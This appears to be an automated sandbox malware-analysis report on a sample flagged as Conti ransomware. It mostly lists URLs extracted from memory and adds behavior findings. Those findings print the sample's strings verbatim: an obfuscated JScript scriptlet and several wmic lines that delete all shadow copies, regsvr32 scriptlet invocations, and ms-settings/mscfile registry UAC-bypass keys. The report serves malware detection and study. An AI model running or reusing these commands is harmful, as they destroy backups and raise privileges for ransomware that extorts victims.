    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
    Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
    Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249181411.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wre
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.local
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.local/
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
    Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
    Source: taskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://s.yimg.com/av/ads/1599143076228-3140.jpg=gdpr
    Source: taskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmpString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=9a5be529d6034927bda092231704a93b&c=MSN&d=http%3A%2F%2Fwww.msn
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
    Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=892565928.1601478348
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272532648.00000255FA050000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
    Source: taskhostw.exe, 0000001E.00000000.272532648.00000255FA050000.00000002.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
    Source: svchost.exe, svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp, taskhostw.exe, taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp, readme.txt.3.drString found in binary or memory: https://www.torproject.org/
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/

    Spam, unwanted Advertisements and Ransom Demands:

    barindex
    Found ransom note / readmeShow sources
    Source: C:\Users\Public\readme.txtDropped file: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>
    Yara detected Conti ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3020, type: MEMORY
    Deletes shadow drive data (may be related to ransomware)Show sources
    Source: 7906dc47_by_Libranalysis.exeBinary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: 7906dc47_by_Libranalysis.exe, 00000002.00000002.326052029.000001BB04C60000.00000040.00000001.sdmpBinary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Source: sihost.exeBinary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: sihost.exe, 00000003.00000002.495205256.0000024D2C410000.00000040.00000001.sdmpBinary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Source: svchost.exeBinary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: svchost.exe, 00000004.00000002.494909669.0000024843FF0000.00000040.00000001.sdmpBinary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Source: svchost.exeBinary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmpBinary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmpBinary or memory string: \semprocess call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.l /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process calsk
    Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"(m
    Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002
    Source: WMIC.exe, 0000001C.00000002.267392040.0000026D07EB0000.00000004.00000040.sdmpBinary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85
    Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe Delete Shadows /all /quiet
    Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmpBinary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietPz
    Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
    Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001C.00000002.267417577.0000026D07EB5000.00000004.00000040.sdmpBinary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
    Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmpBinary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmpBinary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmpBinary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: taskhostw.exeBinary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmpBinary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Source: WMIC.exe, 0000001F.00000002.267280739.000002599DD40000.00000004.00000040.sdmpBinary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85W
    Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmpBinary or memory string: vssadmin.exe Delete Shadows /all /quiet
    Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmpBinary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietv
    Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmpBinary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmpBinary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmpBinary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"{
    Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
    Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: WMIC.exe, 0000001F.00000003.255019902.000002599DAE3000.00000004.00000001.sdmpBinary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quiety
    Source: WMIC.exe, 0000001F.00000002.267299677.000002599DD45000.00000004.00000040.sdmpBinary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
    Source: ComputerDefaults.exe, 00000021.00000002.266675123.000001E991F58000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"|
    Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002Z
    Modifies existing user documents (likely ransomware behavior)Show sources
    Source: C:\Windows\System32\sihost.exeFile moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
    Source: C:\Windows\System32\sihost.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
    Source: C:\Windows\System32\sihost.exeFile moved: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdfJump to behavior
    Source: C:\Windows\System32\sihost.exeFile deleted: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdfJump to behavior
    Source: C:\Windows\System32\sihost.exeFile moved: C:\Users\user\Desktop\LSBIHQFDVT.docxJump to behavior

    System Summary:

    barindex
    Contains functionality to create processes via WMIShow sources
    Source: WMIC.exe, 00000009.00000002.241117986.00000232C5730000.00000004.00000020.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"|
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB5710B6 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB02490104
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB05820A16
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB05890A16
    Source: C:\Windows\System32\sihost.exeCode function: 3_2_0000024D2C410A16
    Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000024843FF0A16
    Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000020A025A0A16
    Source: C:\Windows\System32\taskhostw.exeCode function: 30_2_00000255F9EB0A16
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: No import functions for PE file found
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
